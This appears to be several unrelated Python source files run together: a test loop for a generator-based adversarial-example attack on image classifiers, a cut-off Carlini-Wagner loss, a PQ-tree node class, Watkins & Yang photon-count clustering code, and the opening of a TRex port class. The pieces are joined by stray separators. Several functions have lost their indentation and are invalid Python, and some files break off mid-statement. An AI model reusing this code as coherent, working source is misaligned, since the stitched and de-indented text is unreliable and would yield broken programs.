def L2_test_model(args,epoch,test_loader,model,G,nc=1,h=28,w=28,mode="NotTest"):
    '''Testing Phase: evaluate a generator-based attack, with optional
    resampling of examples the attack failed on.

    For each batch one perturbation is drawn from G and accuracy is
    measured.  When mode == 'Test' and args.resample_test is set, the still
    correctly-classified (i.e. not fooled) examples are re-attacked up to
    args.resample_iterations times and per-iteration / cumulative fooling
    rates are printed (and logged to comet when enabled).
    '''
    test_itr = tqdm(enumerate(test_loader),\
            total=len(test_loader.dataset)/args.batch_size)
    correct_test = 0
    # Empty list to hold resampling results. Since we loop batches, results
    # accumulate in appropriate list index, where index is the sampling number
    resample_adv = [[] for i in range(args.resample_iterations)]
    for batch_idx, (data, target) in test_itr:
        x, target = data.to(args.device), target.to(args.device)
        if not args.vanilla_G:
            delta, kl_div = G(x)
        else:
            delta = G(x)
        delta = delta.view(delta.size(0), nc, h, w)
        adv_inputs = x + delta
        adv_inputs = torch.clamp(adv_inputs, -1.0, 1.0)
        pred = model(adv_inputs.detach())
        out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
        corr_adv_tensor = out.eq(target.unsqueeze(1).data)
        correct_test += out.eq(target.unsqueeze(1).data).sum()
        # idx marks examples still classified correctly (attack FAILED on them)
        idx = corr_adv_tensor > 0
        # Resample failed examples
        if mode == 'Test' and args.resample_test:
            re_x = x.detach()
            for j in range(args.resample_iterations):
                if len(re_x) == 0:
                    break
                delta, kl_div = G(re_x)
                adv_inputs = re_x + delta.detach()
                adv_inputs = torch.clamp(adv_inputs, -1.0, 1.0)
                pred = model(adv_inputs.detach())
                out = pred.max(1, keepdim=True)[1] # get the index of the max log-probability
                # From previous correct adv tensor,get indices for correctly pred
                # Since we care about those on which attack failed
                correct_failed_adv = out.eq(target.unsqueeze(1).data)
                failed_only = correct_failed_adv[idx]
                # clear idx entries that this resampling round managed to fool
                for i in range(0,len(idx)):
                    if idx[i] == 1:
                        if correct_failed_adv[i] == 0:
                            idx[i] = 0
                resample_adv[j].extend(failed_only.cpu().numpy().tolist())
    print('\nTest set: Accuracy: {}/{} ({:.0f}%)\n'\
            .format(correct_test, len(test_loader.dataset),\
                100. * correct_test.cpu().numpy() / len(test_loader.dataset)))
    if args.comet:
        test_acc = 100. * correct_test / len(test_loader.dataset)
        args.experiment.log_metric("Test Adv Accuracy",test_acc,step=epoch)
        if not args.mnist:
            index = np.random.choice(len(x) - 64, 1)[0]
            clean_image = (x)[index:index+64].detach()
            adv_image = (x + delta)[index:index+64].detach()
            delta_image = (delta)[index:index+64].detach()
        else:
            clean_image = (x)[0].detach()
            adv_image = (x + delta)[0].detach()
            delta_image = (delta)[0].detach()
        file_base = "adv_images/" + args.namestr + "/"
        if not os.path.exists(file_base):
            os.makedirs(file_base)
        plot_image_to_comet(args,clean_image,file_base+"clean.png",normalize=True)
        plot_image_to_comet(args,adv_image,file_base+"Adv.png",normalize=True)
        plot_image_to_comet(args,delta_image,file_base+"delta.png",normalize=True)
    # Log resampling stuff
    if mode =='Test' and args.resample_test:
        cumulative = 0
        size_test = len(resample_adv[0])
        for j in range(len(resample_adv)):
            # entries are 1 when still correct; "fooled" counts the zeros
            fooled = len(resample_adv[j]) - sum(resample_adv[j])
            if len(resample_adv[j]) == 0:
                percent_fooled = 0
            else:
                percent_fooled = fooled / len(resample_adv[j])
            cumulative += fooled
            cum_per_fooled = cumulative / size_test
            print("Resampling perc fooled %f at step %d" % (percent_fooled,j))
            print("Resampling perc cumulative fooled %f at step %d" % (cum_per_fooled,j))
            if args.comet:
                args.experiment.log_metric("Resampling perc fooled",percent_fooled,step=j)
                args.experiment.log_metric("Resampling perc cumulative fooled",cum_per_fooled,step=j)
def carlini_wagner_loss(args, output, target, scale_const=1):
# compute the probability of the label class versus the maximum other
target_onehot = torch.zeros(target.size() + (args.classes,))
target_onehot = target_onehot.cuda()
target_onehot.scatter_(1, target.unsqueeze(1), 1.)
target_var = Variable(target_onehot, requires_grad=False)
real = (target_var * output).sum(1)
confidence = 0
other = ((1. | |
<filename>emr_mine_python_scipts/pq_tree/PQNode.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
from SiblingVector import SiblingVector
pq_counter = 0
class PQNode(object):
    """ generated source for PQNode

    A node of what appears to be a PQ-tree (P-nodes allow arbitrary child
    permutation, Q-nodes only reversal).  The class-level values below act
    as defaults; init() resets the corresponding instance attributes.
    """
    # labels assigned to nodes during the reduction phase
    LABEL_EMPTY = 0
    LABEL_PARTIAL = 1
    LABEL_FULL = 2
    # node kinds
    TYPE_PNODE = 0
    TYPE_QNODE = 1
    label = 0
    blocked = bool()
    queued = bool()
    type = 0
    pertinentChildCount = 0
    pertinentLeafCount = 0
    parent = None
    # circular doubly-linked list links among a P-node's children
    left = None
    right = None
    # links within the circular list of FULL children
    fullLeft = None
    fullRight = None
    # links within the circular list of PARTIAL children
    partialLeft = None
    partialRight = None
    childCount = 0
    fullChildCount = 0
    partialChildCount = 0
    data = None
    deleted = bool()
    pseudoNode = bool()
    # Q-node bookkeeping: list of endmost children + per-child sibling vectors
    endMostChildren = None
    siblings = None
    # entry pointers into the circular child lists (all / full / partial)
    childAccessNode = None
    fullChildAccessNode = None
    partialChildAccessNode = None
    subLeafCount = 0
    depth = 0
    childBounds = 0
    leftBound = 0
def init(self, pNode = True):
self.childAccessNode = None
self.fullChildAccessNode = None
self.partialChildAccessNode = None
self.endMostChildren = None
self.siblings = None
self.childCount = 0
self.fullChildCount = 0
self.partialChildCount = 0
self.label = self.LABEL_EMPTY
self.pertinentChildCount = 0
self.pertinentLeafCount = 0
self.queued = False
self.parent = None
self.left = None
self.right = None
self.fullLeft = None
self.fullRight = None
self.partialLeft = None
self.partialRight = None
if pNode:
self.type = self.TYPE_PNODE
else:
self.type = self.TYPE_QNODE
self.data = None
self.deleted = False
self.pseudoNode = False
global pq_counter
self.internal_id = pq_counter
pq_counter += 1
def __init__(self, data = None):
self.init(True)
if data != None:
self.data = data
    def getPertinentChildCount(self):
        """Number of pertinent children recorded for the current reduction."""
        return self.pertinentChildCount
    def setPertinentChildCount(self, value):
        self.pertinentChildCount = value
    def getPertinentLeafCount(self):
        """Number of pertinent leaves recorded for the current reduction."""
        return self.pertinentLeafCount
    def setPertinentLeafCount(self, value):
        self.pertinentLeafCount = value
    def isPseudoNode(self):
        return self.pseudoNode
    def pseudoNode(self):
        # NOTE(review): this method shares its name with the instance
        # attribute assigned in init(); after construction the boolean
        # attribute shadows the method, so this looks uncallable on
        # instances — confirm whether it should be renamed.
        self.pseudoNode = True
        self.childBounds = 0
        self.leftBound = sys.maxint  # Python 2 only (sys.maxsize in Python 3)
        self.subLeafCount = self.pertinentChildCount
    def isDeleted(self):
        return self.deleted
    def delete(self):
        """Mark this node deleted, resetting it via init(False)."""
        self.init(False)
        self.deleted = True
    def getParent(self):
        return self.parent
    def setParent(self, theParent):
        self.parent = theParent
    def getSiblings(self):
        return self.siblings
    def getNumFullChildren(self):
        return self.fullChildCount
    def getNumPartialChildren(self):
        return self.partialChildCount
    def isQNode(self):
        return (self.type == self.TYPE_QNODE)
    def isPNode(self):
        return (self.type == self.TYPE_PNODE)
    def isFull(self):
        return (self.label == self.LABEL_FULL)
    def isPartial(self):
        return (self.label == self.LABEL_PARTIAL)
    def isEmpty(self):
        return (self.label == self.LABEL_EMPTY)
    def isBlocked(self):
        return self.blocked
    def setBlocked(self):
        self.blocked = True
    def setUnblocked(self):
        self.blocked = False
    def setQueued(self):
        self.queued = True
    def isQueued(self):
        return self.queued
    def getData(self):
        return self.data
    def getLabel(self):
        return self.label
    def getEndMostChildren(self):
        return self.endMostChildren
    def becomeRoot(self):
        """Detach from the parent, making this node a root."""
        self.parent = None
    def getDepth(self):
        return self.depth
    def getNumChildren(self):
        # Q-nodes only track their endmost children, so no count is kept.
        if self.isQNode():
            raise Exception("*** Warning, Qnodes do not store num children")
        return self.childCount
    def getNumEmptyChildren(self):
        """Empty children = all children minus full and partial ones (P-nodes only)."""
        if self.isQNode():
            raise Exception("*** Warning, Qnodes do not store num (empty) children")
        return self.childCount - self.fullChildCount - self.partialChildCount
def convertToQNode(self):
self.type = self.TYPE_QNODE
self.endMostChildren = []
if self.childCount > 0:
raise Exception("*** ERROR cannot convert to qnode unless no children present!")
    def convertToPNode(self):
        """Turn this node back into a P-node (drops the endmost-child list)."""
        self.type = self.TYPE_PNODE
        self.endMostChildren = None
    def labelAsFull(self):
        """Relabel as FULL, re-filing this node in its parent's child lists.

        The remove/re-add around the label change keeps the parent's
        full/partial counters and access pointers consistent.
        """
        if not self.isFull():
            if self.parent is not None:
                self.parent.removeChild(self, False)
            self.label = self.LABEL_FULL
            if self.parent is not None:
                self.parent.addChild(self, False)
    def labelAsPartial(self):
        """Relabel as PARTIAL, re-filing this node in its parent's child lists."""
        if not self.isPartial():
            if self.parent is not None:
                self.parent.removeChild(self, False)
            self.label = self.LABEL_PARTIAL
            if self.parent is not None:
                self.parent.addChild(self, False)
    def labelAsEmpty(self):
        """Relabel as EMPTY, re-filing this node in its parent's child lists."""
        if not self.isEmpty():
            if self.parent is not None:
                self.parent.removeChild(self, False)
            self.label = self.LABEL_EMPTY
            if self.parent is not None:
                self.parent.addChild(self, False)
def hasChildren(self):
if self.isPNode():
return self.childCount > 0
else:
if self.isQNode():
return len(self.endMostChildren) > 0
else:
return False
    def getAllChildren(self):
        """Collect every child of this node into a list, in sibling order.

        P-node children are walked via the circular doubly-linked list
        anchored at childAccessNode; Q-node children are walked through
        their sibling vectors starting from the first endmost child.
        """
        allVector = []
        if self.isPNode():
            if self.hasChildren():
                currentNode = self.childAccessNode
                while True:
                    allVector.append(currentNode)
                    # debug trap: a broken circular list yields a None link
                    if currentNode is None:
                        print "parent of crap: " + self.infoString()
                    currentNode = currentNode.right
                    if (currentNode == self.childAccessNode):
                        break
        else:
            if self.isQNode():
                if self.hasChildren():
                    previousNode = None
                    currentNode = self.endMostChildren[0]
                    nextNode = PQNode()
                    lastNode = None
                    # For pseudonodes the endmost children may have siblings
                    # outside the pseudonode; use those as walk boundaries.
                    if self.isPseudoNode():
                        if currentNode.siblings.siblingAt(0) is not None and (currentNode.siblings.siblingAt(0).parent != self):
                            previousNode = currentNode.siblings.siblingAt(0)
                        else:
                            if currentNode.siblings.siblingAt(1) is not None and (currentNode.siblings.siblingAt(1).parent != self):
                                previousNode = currentNode.siblings.siblingAt(1)
                        if len(self.endMostChildren) > 1:
                            tempNode = self.endMostChildren[1]
                            if tempNode.siblings.siblingAt(0) is not None and (tempNode.siblings.siblingAt(0).parent != self):
                                lastNode = tempNode.siblings.siblingAt(0)
                            else:
                                if tempNode.siblings.siblingAt(1) is not None and (tempNode.siblings.siblingAt(1).parent != self):
                                    lastNode = tempNode.siblings.siblingAt(1)
                    # walk sibling-to-sibling until the far boundary is reached
                    while True:
                        allVector.append(currentNode)
                        nextNode = currentNode.siblings.nextSibling(previousNode)
                        previousNode = currentNode
                        currentNode = nextNode
                        if (currentNode == lastNode):
                            break
        return allVector
    def moveFullChildrenTo(self, newNode):
        """Detach every FULL child of this P-node and re-attach it to newNode."""
        if self.isPNode():
            if self.fullChildCount > 0:
                currentNode = self.fullChildAccessNode
                nextNode = PQNode()
                while True:
                    # grab the next link first; removeChild unlinks currentNode
                    nextNode = currentNode.fullRight
                    self.removeChild(currentNode)
                    newNode.addChild(currentNode)
                    currentNode = nextNode
                    # presumably removeChild clears fullChildAccessNode once
                    # the full list is empty, terminating the walk — confirm
                    if self.fullChildAccessNode is None:
                        break
        else:
            raise Exception("*** ERROR move full children method not meant for children of q nodes!")
def getPartialChild(self, index):
if index + 1 > self.partialChildCount:
raise Exception("*** ERROR tried to get a partial child that does not exist! [" + index + "]")
if (index == 0):
return self.partialChildAccessNode
else:
if (index == 1):
return self.partialChildAccessNode.partialRight
else:
raise Exception("*** ERROR tried to get a partial child that does not exist! [" + index + "]")
def removeOnlyFullChild(self):
if self.isPNode():
if (self.fullChildCount != 1):
raise Exception("*** ERROR not exactly one full child to remove! " + self.fullChildCount)
returnNode = self.fullChildAccessNode
self.removeChild(returnNode)
return returnNode
else:
raise Exception("*** ERROR remove only full child is only meant for p nodes!")
def removeOnlyEmptyChild(self):
if self.isPNode():
if (self.getNumEmptyChildren() != 1):
raise Exception("*** ERROR not exactly one empty child to remove! " + self.getNumEmptyChildren())
returnNode = self.childAccessNode
while True:
if returnNode.isEmpty():
break
returnNode = returnNode.right
if (returnNode == self.childAccessNode):
break
self.removeChild(returnNode)
return returnNode
else:
raise Exception("*** ERROR remove only empty child is only meant for p nodes!")
def addChild(self, pq, modify = True):
if pq.isFull():
self.fullChildCount += 1
pq.fullLeft = None
pq.fullRight = None
if self.fullChildAccessNode is None:
self.fullChildAccessNode = pq
self.fullChildAccessNode.fullLeft = self.fullChildAccessNode
self.fullChildAccessNode.fullRight = self.fullChildAccessNode
else:
pq.fullLeft = self.fullChildAccessNode.fullLeft
pq.fullLeft.fullRight = pq
self.fullChildAccessNode.fullLeft = pq
pq.fullRight = self.fullChildAccessNode
self.fullChildAccessNode = pq
else:
if pq.isPartial():
self.partialChildCount += 1
pq.partialLeft = None
pq.partialRight = None
if self.partialChildAccessNode is None:
self.partialChildAccessNode = pq
self.partialChildAccessNode.partialLeft = self.partialChildAccessNode
self.partialChildAccessNode.partialRight = self.partialChildAccessNode
else:
pq.partialLeft = self.partialChildAccessNode.partialLeft
pq.partialLeft.partialRight = pq
self.partialChildAccessNode.partialLeft = pq
pq.partialRight = self.partialChildAccessNode
self.partialChildAccessNode = pq
if self.isPNode() and modify:
pq.parent = self
self.childCount += 1
pq.left = None
pq.right = None
pq.siblings = None
if self.childAccessNode is None:
self.childAccessNode = pq
self.childAccessNode.left = self.childAccessNode
self.childAccessNode.right = self.childAccessNode
else:
pq.left = self.childAccessNode.left
pq.left.right = pq
self.childAccessNode.left = pq
pq.right = self.childAccessNode
self.childAccessNode = pq
else:
if self.isQNode() and modify:
pq.parent = self
sibling = None
if pq.siblings is not None:
if pq.siblings.siblingAt(0) is not None and self.endMostChildren.contains(pq.siblings.siblingAt(0)):
sibling = pq.siblings.siblingAt(0)
else:
if pq.siblings.siblingAt(1) is not None and self.endMostChildren.contains(pq.siblings.siblingAt(1)):
sibling = pq.siblings.siblingAt(1)
else:
pq.siblings = SiblingVector()
if sibling is None:
## for-while
i = 0
while i < len(self.endMostChildren):
if (self.endMostChildren[i].label == pq.label):
sibling = self.endMostChildren[i]
break
else:
if self.endMostChildren[i].isFull() and pq.isPartial():
sibling = self.endMostChildren[i]
break
else:
if self.endMostChildren[i].isPartial() and pq.isFull():
sibling = self.endMostChildren[i]
break
i += 1
if sibling is None and len(self.endMostChildren) > 0:
sibling = self.endMostChildren[0]
if sibling is not None:
if len(self.endMostChildren) > 1:
self.endMostChildren.remove(sibling)
self.endMostChildren.append(pq)
sibling.siblings.addSibling(pq)
pq.siblings.addSibling(sibling)
else:
self.endMostChildren.append(pq)
else:
if self.isQNode() and self.isPseudoNode():
pq.parent = self
if self.childAccessNode is None:
self.childAccessNode = pq
if pq.siblings is not None and (len(pq.siblings) == 2):
if not pq.siblings.siblingAt(0).parent.isPseudoNode() and pq.siblings.siblingAt(1).parent.isPseudoNode():
self.endMostChildren.append(pq)
else:
raise Exception("*** ERROR invalid child being added to pseudonode!")
def absorbPartialChild(self, partialChild):
if self.isQNode() and partialChild.isQNode() and partialChild.isPartial():
fullConnectChild = partialChild.siblings.siblingAt(0)
if not fullConnectChild.isFull() and not fullConnectChild.isPartial():
fullConnectChild = partialChild.siblings.siblingAt(1)
if fullConnectChild is not None and not fullConnectChild.isFull() and not fullConnectChild.isPartial():
fullConnectChild = None
emptyConnectChild = partialChild.siblings.siblingAt(0)
if not emptyConnectChild.isEmpty():
emptyConnectChild = partialChild.siblings.siblingAt(1)
if emptyConnectChild is not None and not emptyConnectChild.isEmpty():
emptyConnectChild = None
fullJoinChild = partialChild.endMostChildren[0]
if not fullJoinChild.isFull():
fullJoinChild = None
if len(partialChild.endMostChildren) > 1:
fullJoinChild = partialChild.endMostChildren[1]
if not fullJoinChild.isFull():
fullJoinChild = None
emptyJoinChild = partialChild.endMostChildren[0]
if not emptyJoinChild.isEmpty():
emptyJoinChild = None
if len(partialChild.endMostChildren) > 1:
emptyJoinChild = partialChild.endMostChildren[1]
if not emptyJoinChild.isEmpty():
emptyJoinChild = None
if fullJoinChild is None or emptyJoinChild is None:
raise Exception("*** ERROR invalid partial child in absorb partial child!")
if fullConnectChild is not None:
fullJoinChild.siblings.addSibling(fullConnectChild)
fullConnectChild.siblings.removeSibling(partialChild)
fullConnectChild.siblings.addSibling(fullJoinChild)
else:
if not self.endMostChildren.remove(partialChild):
raise Exception("*** ERROR could not absorb partial child!")
fullJoinChild.parent = self
self.endMostChildren.append(fullJoinChild)
if emptyConnectChild is not None:
emptyJoinChild.siblings.addSibling(emptyConnectChild)
emptyConnectChild.siblings.removeSibling(partialChild)
emptyConnectChild.siblings.addSibling(emptyJoinChild)
else:
if not self.endMostChildren.remove(partialChild):
raise | |
'''
This file contains the functions for the grouping/clustering algorithm from Watkins & Yang, J. Phys. Chem. B, vol 109, no 1, 2005
that do the actual work. This includes
(1) initial hierarchical clustering - InitialClustering
(2) with that clustering as input, Bayesian Inf. Crit. based clustering into m-levels
'''
# import approxpoissondpf
import numpy as np
import numpy.matlib
import matplotlib.pyplot as plt
from scipy.stats import poisson
import pandas as pd
def Grouping(segmentlengths, segmentcounts, mingroups, maxgroups):
    '''
    Run BIC-based EM clustering for every candidate number of states.

    input
      segmentlengths : the lengths of the CPA segments
      segmentcounts  : the nr of counts in each CPA segment
      mingroups      : the minimum nr of groups to test for
      maxgroups      : the maximum nr of groups to test for
    output
      groupingdata : DataFrame with the nr of states and their likelihoods,
                     via the 2 different Schwarz criteria of Watkins & Yang
      mlikely_tot  : most likely trajectory through the states, per m
      psummarry    : likelihood of drawing a certain state given m states;
                     this is TIME occupancy, not NUMBER occupancy (see pm)
    '''
    # hierarchical pre-clustering supplies the initial assignment per m
    initialcluster = InitialClustering(segmentlengths, segmentcounts, plot=False)
    nseg = len(segmentlengths)
    Schw = np.zeros([maxgroups, 2])
    psummarry = np.zeros([maxgroups, maxgroups])
    mlst = np.arange(mingroups, maxgroups + 1)  # candidate numbers of levels
    mlikely_tot = np.zeros((maxgroups, nseg), dtype=int)
    for mgroups in mlst:
        pm, Im, Tm, mlikely, schwartz, pmj = ExpectationMaximizationClustering(
            segmentlengths, segmentcounts, mgroups, initialcluster[mgroups - 1])
        Schw[mgroups - mingroups] = schwartz
        mlikely_tot[mgroups - 1] = mlikely
        psummarry[mgroups - 1, :mgroups] = pm
    frame = pd.DataFrame({'mlst': mlst, 'Schw0': Schw[:, 0], 'Schw1': Schw[:, 1]})
    groupingdata = frame[['mlst', 'Schw0', 'Schw1']]
    return groupingdata, mlikely_tot, psummarry
def ApproxPoissPDF(k, mu):
    """Element-wise Poisson pmf using Stirling's approximation for log(k!).

    log P(k; mu) = k*log(mu) - mu - log(k!), with log(k!) replaced by
    Stirling's formula k*log(k) - k + 0.5*log(2*pi*k).  The approximation
    is undefined at k == 0, so those entries use the exact scipy pmf.

    Args:
        k  : array of observed counts.
        mu : array of expected counts (same shape as k).

    Returns:
        (pdf, logpdf): tuple of arrays with the pmf and its natural log.
    """
    k = np.asarray(k)
    mu = np.asarray(mu)
    zero = (k == 0)
    # Substitute k=1 where k==0 so np.log stays quiet; those entries are
    # overwritten with the exact value below.  (The original computed
    # log(0), emitting RuntimeWarnings and a NaN before patching them.)
    ksafe = np.where(zero, 1, k)
    logpdf = k*np.log(mu) - mu - (ksafe*np.log(ksafe) - k + 0.5*np.log(2*np.pi*ksafe))
    logpdf = np.where(zero, np.log(poisson.pmf(0, mu)), logpdf)
    pdf = np.exp(logpdf)
    return (pdf, logpdf)
def ClusterOnce(TG, NG, assignment):
    '''
    Merge the single most similar pair of states into one.

    TG: durations of the current states (jumplengths)
    NG: photon counts of the current states (rNlevels)
    assignment: current state index of every original segment

    Returns (hitpair, TG, NG, assignment) where the winning pair has been
    pooled into its lower index and all higher state indices shifted down.
    '''
    n = len(NG)
    # pairwise merge scores, Eq 11 of Watkins & Yang (meshgrids are 0-based,
    # so +1 recovers the paper's 1-based indexing)
    Tm, Tj = np.meshgrid(TG, TG)
    Nm, Nj = np.meshgrid(NG, NG)
    m, j = np.meshgrid(np.arange(n), np.arange(n))
    m = m + 1
    j = j + 1
    # Mmj is symmetric, so the Mmj-vs-Mjm question is moot
    Mmj = (Nm+Nj)*np.log((Nm+Nj)/(Tm+Tj)) - (Nm)*np.log((Nm/Tm)) - (Nj)*np.log((Nj/Tj))
    # indices of the strictly-upper-triangular entries (note: Python 0-based)
    idx = np.where(np.ndarray.flatten(np.triu(m, 1), 'F') > 0)[0]
    # largest score among those entries...
    winner_idx = np.argmax(np.ndarray.flatten(Mmj)[idx])
    # ...mapped back to a 2-d (row, col) pair, low index first
    hitpair = sorted(np.unravel_index(idx[winner_idx], np.shape(Mmj)))
    keep, drop = hitpair
    # pool durations (Eq 12) and counts (Eq 13) into the kept state
    TG[keep] += TG[drop]
    NG[keep] += NG[drop]
    TG = np.delete(TG, drop)
    NG = np.delete(NG, drop)
    # re-point segments of the dropped state, then close the index gap
    assignment[np.where(assignment == drop)] = keep
    shifted = np.where(assignment > drop)
    assignment[shifted] = assignment[shifted] - 1
    return (hitpair, TG, NG, assignment)
def InitialClustering(TG, NG, plot=False):
    '''
    Hierarchical agglomerative pre-clustering of change-point segments.

    Segments are merged pairwise (most similar first, via ClusterOnce) until
    only one state remains; the full merge history is returned and used as
    the initial guess for the EM clustering defined by Watkins & Yang
    (J. Phys. Chem. B 2005, 109, 617-628).

    For speed, long traces are first split into sub-lengths of 300 segments,
    each clustered down to 30 states, before the global pass.

    TG : lengths of the jump segments
    NG : number of counts in the jump segments
    plot : if True, show the assignment matrix as an image

    Returns the (flipped) assignment matrix; presumably row m-1 holds the
    assignment with m states, matching initialcluster[mgroups-1] in
    Grouping() — confirm.
    '''
    sublen = 300           # sub-length size for the partial pre-clustering
    intermediatestop = 30  # states kept per sub-length before recombining
    tg2 = []
    ng2 = []
    hierarchyassignment2 =[]
    N_sublen = int(np.ceil(len(TG)/sublen))
    hierarchyassignment = np.zeros([len(NG)+1, len(NG)], dtype=int) # rows are clustering iterations, columns are segment nr
    hierarchyassignment[0] = np.arange(len(NG))
    if len(TG) > sublen:
# =============================================================================
#         Divide the time series into sub-lengths and partially cluster
# =============================================================================
        for i in range(N_sublen):
            # divide into sub-lengths
            tg2.append(TG[i*sublen:i*sublen+sublen])
            ng2.append(NG[i*sublen:i*sublen+sublen])
            hierarchyassignment2.append(hierarchyassignment[:,i*sublen:(i+1)*sublen])
            # set the assignments to start staggered
            # not strictly necessary, but makes for pretty pictures
            hierarchyassignment2[i] = hierarchyassignment2[i]%sublen + i*intermediatestop
            # do the clustering until you have intermediatestop levels
            p = 0
            while len(ng2[i]) > intermediatestop:
                (hitpair, tg2[i], ng2[i], assignment) = ClusterOnce(tg2[i], ng2[i], hierarchyassignment2[i][p].copy())
                hierarchyassignment2[i][p+1] = assignment
                p = p+1
        # roll last array so the most recently clustered rows line up
        # (the last sub-length may be shorter than sublen, so it finished
        # clustering in fewer iterations than the others)
        last_elemwidth = np.shape(hierarchyassignment2[-1])[1]
        if last_elemwidth < sublen:
            if last_elemwidth <= intermediatestop:
                rollby = sublen - intermediatestop
            if last_elemwidth > intermediatestop:
                rollby = sublen-last_elemwidth
            hierarchyassignment2[-1] = np.roll(hierarchyassignment2[-1], rollby, axis=0)
        # recombine the sub-lengths
        hierarchyassignment = np.concatenate(hierarchyassignment2, axis=1)
        TG = np.concatenate(tg2)
        NG = np.concatenate(ng2)
        # global pass resumes at the row the partial passes stopped at
        p = sublen - intermediatestop
    else:
        p=0
# =============================================================================
#     Cluster all the way down
# =============================================================================
    while len(NG) > 1:
        (hitpair, TG, NG, assignment) = ClusterOnce(TG, NG, hierarchyassignment[p].copy())
        hierarchyassignment[p+1] = assignment
        p = p+1
    # drop the unused (all-zero) rows below the last real iteration
    lastiteration = np.where(np.sum(hierarchyassignment, axis=1)==0)[0][0]
    hierarchyassignment = hierarchyassignment[:lastiteration+1]
    if plot:
        fig, ax = plt.subplots()
        ax.imshow(hierarchyassignment)
        ax.set_xlabel('changepoint segment')
        ax.set_ylabel('clustering iteration')
        ax.set_title('Initial clustering - Fast')
    # flip so that fewer-states assignments come first (row m-1 <-> m states)
    hierarchyassignment = np.flipud(hierarchyassignment)
    return hierarchyassignment
def ExpectationMaximizationClustering(TG, NG, mgroups, initialassignment, printupdates=True):
'''
This function takes a list of segment times and counts and their inital assignment/clustering (the latter is created by InitialClusteringFast() or InitialClustering())
It follows the clustering as described by Watkins & Yang (J. Phys. Chem. B 2005, 109, 617-628)
TG : lengths of the jump segments
NG : number of counts in the jump segments
initialassignment: the initial clustering
'''
Ttotal=np.sum(TG);
ncp=len(TG);
ntotal=np.sum(NG);
pmj = np.zeros([mgroups, len(NG)])
# initialize - eqn 14
for m in range(mgroups):
pmj[m] = 1.0*(initialassignment==m)
success=0
qq=0
qqmax=200 # max nr of iterations
logLKlast=1
tolerance = 1E-8
'''start of Figure 9, Watkins & Yang'''
while success==0:
qq = qq+1
# M-step
Tm = np.matmul(pmj, TG) # list of total durations of segments
Mn = np.matmul(pmj, NG) # list of total counts in segments
Im = Mn/Tm # list of intensities in segments
pm = Tm/Ttotal # probability of drawing an Ij number from the mth intensity level
pmjnew = np.zeros([mgroups, len(NG)])
# E-step
for m in range(mgroups):
pmjnew[m] = pm[m]*ApproxPoissPDF(NG, TG*Im[m])[0]
# check for tricky ones so you don't divide by zero
idx = np.where(np.sum(pmjnew,axis=0)==0.) # find columns that add to zero
# divide out the nontricky ones, dummy operation for the tricky ones
denom=np.matlib.repmat(np.sum(pmjnew, axis=0),mgroups, 1);
denom[:,idx]=denom[:,idx]+1.0
pmjnew=pmjnew/denom
# original version, causes and catches warning:
# pmjnew=pmjnew/np.matlib.repmat(np.sum(pmjnew, axis=0),mgroups, 1)
# now we could have a bunch of NaN ones. We set those to the previous iteration's value
# pmjnew[:,idx] = pmj[:,idx]
'''stop criterion
from J Phys Chem B 123, 689: If Wastkins Eqn 15 of Watkins hardly changes, you have converged'''
logLK = np.zeros(np.shape(pmj))
for m in range(mgroups):
[g, logg] = ApproxPoissPDF(NG, TG*Im[m])
logLK[m] = np.log(pm[m]) + logg # not pmjnew?
logLK = np.sum(pmj*logLK)
if qq>2:
if abs(logLK/logLKlast-1)<tolerance:
success = 1
if qq==qqmax:
success = 1
if printupdates:
print('terminated before full convergence at m='+str(mgroups))
logLKlast = logLK
pmj = pmjnew
'''End of Figure 9'''
# now sort all the levels in order of intensity
if mgroups > 1:
inds = (-pm).argsort()
pm = pm[inds]
Tm = Tm[inds]
Im = Im[inds]
pmj = pmj[inds]
# since you have m groups, the most likely trajectory is
# pmjlikely = np.amax(pmj, axis=0)
mlikely = np.argmax(pmj, axis=0)
# if you only have one level
else:
mlikely = np.zeros(len(NG), dtype=int)
# pmjlikely = pmj
# the log likelyhood of the data given this trace is
# Eq 15 of Watkins & Yang
[g, logg] = ApproxPoissPDF(NG, TG*Im[mlikely])
logLKv1 = np.log(pm[mlikely])+logg
#alternatively take Eq 15 to the letter
logLK = np.zeros([mgroups,len(NG)])
for m in range(mgroups):
[g, logg] = ApproxPoissPDF(NG, TG*Im[m])
logLK[m] = np.log(pm[m]) + logg
logLKv2 = np.sum(pmj*logLK)
# Now use this as input for eqn 16
# to accomodate the weird sentence 8 lines below Eq 16, calculate the reduced number of CPs
ncp = 1+len(np.where(np.diff(mlikely)!=0)[0])
schwarz1 = np.sum(logLKv1)*2 - (2*mgroups-1)*np.log(ncp) - ncp*np.log(ntotal)
schwarz2 = np.sum(logLKv2)*2 - (2*mgroups-1)*np.log(ncp) - ncp*np.log(ntotal)
schwartz = [schwarz1, schwarz2]
return | |
<gh_stars>0
from collections import namedtuple, OrderedDict
from .trex_stl_packet_builder_scapy import STLPktBuilder
from .trex_stl_streams import STLStream
from .trex_stl_types import *
from .rx_services.trex_stl_rx_service_ipv6 import *
from . import trex_stl_stats
from .utils.constants import FLOW_CTRL_DICT_REVERSED
from .utils.common import list_difference, list_intersect
import base64
from copy import deepcopy
from datetime import datetime, timedelta
import threading
StreamOnPort = namedtuple('StreamOnPort', ['compiled_stream', 'metadata'])
########## utility ############
def mult_to_factor(mult, max_bps_l2, max_pps, line_util):
    """Translate a multiplier object into a raw rate factor.

    'raw' passes the value through; 'bps'/'pps'/'percentage' normalize the
    value against the port's max L2 bps, max pps or line utilization.
    Unknown types yield None, as before.
    """
    mult_type = mult['type']
    if mult_type == 'raw':
        return mult['value']
    denominators = {'bps': max_bps_l2,
                    'pps': max_pps,
                    'percentage': line_util}
    if mult_type in denominators:
        return mult['value'] / denominators[mult_type]
# describes a single port
class Port(object):
    """Represents a single port: holds its state machine, attached streams,
    stats and the RPC handles used to drive the server-side port."""
    # state-machine values
    STATE_DOWN = 0
    STATE_IDLE = 1
    STATE_STREAMS = 2
    STATE_TX = 3
    STATE_PAUSE = 4
    STATE_PCAP_TX = 5
    # all-ones 64-bit mask
    MASK_ALL = ((1 << 64) - 1)
    PortState = namedtuple('PortState', ['state_id', 'state_name'])
    # human-readable state names; NOTE(review): STREAMS also maps to "IDLE"
    # — looks intentional (streams attached but not transmitting), confirm
    STATES_MAP = {STATE_DOWN: "DOWN",
                  STATE_IDLE: "IDLE",
                  STATE_STREAMS: "IDLE",
                  STATE_TX: "TRANSMITTING",
                  STATE_PAUSE: "PAUSE",
                  STATE_PCAP_TX : "TRANSMITTING"}
